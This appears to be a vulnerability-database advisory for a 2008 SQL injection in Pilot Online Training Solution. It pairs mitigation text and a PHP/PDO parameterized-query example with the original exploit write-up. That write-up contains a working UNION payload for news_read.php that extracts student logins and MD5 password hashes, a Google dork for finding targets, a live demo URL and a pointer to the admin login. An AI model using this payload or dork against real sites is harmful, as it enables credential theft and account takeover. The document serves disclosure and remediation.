Vendor: learning management system
By: S.W.A.T.
CVSS: 8.8 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: learning management system
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pilot Online Training Solution Remote SQL Injection Vulnerability

A SQL injection vulnerability exists in Pilot Online Training Solution that allows an attacker to inject arbitrary SQL commands. An attacker can exploit it by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify data, or execute system-level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.
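
An added example, not code from the vendor or from the advisory's author, showing both mitigations applied to the id parameter of news_read.php in PHP with PDO. The in-memory SQLite database, the news columns and the function names are assumptions; students(login, password) is the table named in the advisory below.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database (in-memory SQLite).
// The news columns are assumed; students(login, password) is the table
// named in the advisory. All rows are constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec('CREATE TABLE students (login TEXT, password TEXT)');
$pdo->exec("INSERT INTO news VALUES (1, 'Term dates', 'Classes start Monday.')");
$pdo->exec("INSERT INTO students VALUES ('admin', 'constructed-hash-placeholder')");

// Layer 1, input validation: a news id is a short run of ASCII digits.
function parseNewsId(string $raw): ?int
{
    return preg_match('/\A[0-9]{1,9}\z/', $raw) === 1 ? (int) $raw : null;
}

// Layer 2, parameterized query: the value is bound as data and can never
// become SQL syntax, whatever it contains.
function fetchNews(PDO $pdo, string $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hypothetical hardened handler body for news_read.php: validate, then bind.
function readNews(PDO $pdo, string $rawId): ?array
{
    $id = parseNewsId($rawId);
    return $id === null ? null : fetchNews($pdo, (string) $id);
}

// The id value from the advisory's request, kept as a regression input.
$advisoryId = '-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*';

var_dump(readNews($pdo, '1'));          // a legitimate id still resolves to its row
var_dump(readNews($pdo, $advisoryId));  // rejected by validation before any query runs
var_dump(fetchNews($pdo, $advisoryId)); // binding alone: compared as a literal, no students data
```

With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared by the server rather than assembled client-side.
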
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+       Pilot Online Training Solution Remote SQL Injection Vulnerability        +==--
--==+================================================================================+==--

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Site: http://www.elmspro.com/etraining/

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by PG Online Training Solution - learning management system"

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then Crack It & Login ;) :D

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:
www.site.com/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*

Online Demo:
http://www.elmspro.com/etraining/demo/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

Admin Login Is At /admin/


-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


--==+================================================================================+==--
--==+       Pilot Online Training Solution Remote SQL Injection Vulnerability        +==--
--==+================================================================================+==--

# milw0rm.com [2008-09-28]